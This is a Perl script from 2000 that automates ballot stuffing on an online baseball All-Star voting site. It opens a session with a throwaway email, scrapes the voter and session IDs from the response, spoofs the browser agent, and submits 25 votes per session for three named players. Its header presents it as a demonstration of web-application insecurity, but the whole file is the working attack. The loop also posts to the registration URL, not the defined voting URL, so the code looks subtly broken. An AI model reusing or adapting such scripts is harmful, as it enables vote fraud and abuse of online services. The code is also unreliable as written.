#!/usr/bin/perl

# All Star Ballot Stuffing Script
# Exercise in insecurity of web applications

# Marcus Kazmierczak, marcus@mkaz.com
# Sun 2000-06-11  03:19pm 

use LWP::UserAgent;


#Create a user agent object
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.1 " . $ua->agent);

# establish initial session by submitting e-mail
# to the first action form
$email = "test\@testing.com";
$action1 = "http://allstarballoting.seasonticket.com/Reg_post.asp";

my $request = new HTTP::Request POST => $action1;
$request->content_type('application/x-www-form-urlencoded');
$request->content("Email=$email\&Macback=");

my $result = $ua->request($request);
$retval = $result->content;

#debug to se what it returns
#print $retval;

# parse returned value and grab
# created session variables and userid
if ($retval =~ /LoadBallot\('(.*)','(.*)'\)/) {
    $vid = $1;
    $sessionid = $2;
}

print "Session Established for $email VID=$vid,SessionID=$sessionid\n";

# submit 25 votes per e-mail
$action2 = "http://allstarballoting.seasonticket.com/votingform_post.asp";

# Jeff Kent = 407
# Barry Bonds = 303
# Tony Gwynn = 380
$vals = 'NL2ndBase=407&NLOutfield=303&NLOutfield=380';
$hidvals = "VID=$vid\&SessionID=$sessionid";

$c=0;
while ($c < 25) {
    my $req2 = new HTTP::Request POST => $action1;
    $req2->content_type('application/x-www-form-urlencoded');
    $req2->content("$vals\&$hidvals");

    my $res2 = $ua->request($req2);
    if ($res2->is_success) {
        print "\tE-mail: $email  Vote: $c\n";
    }
    $c++;
}

$i++;
print "\n";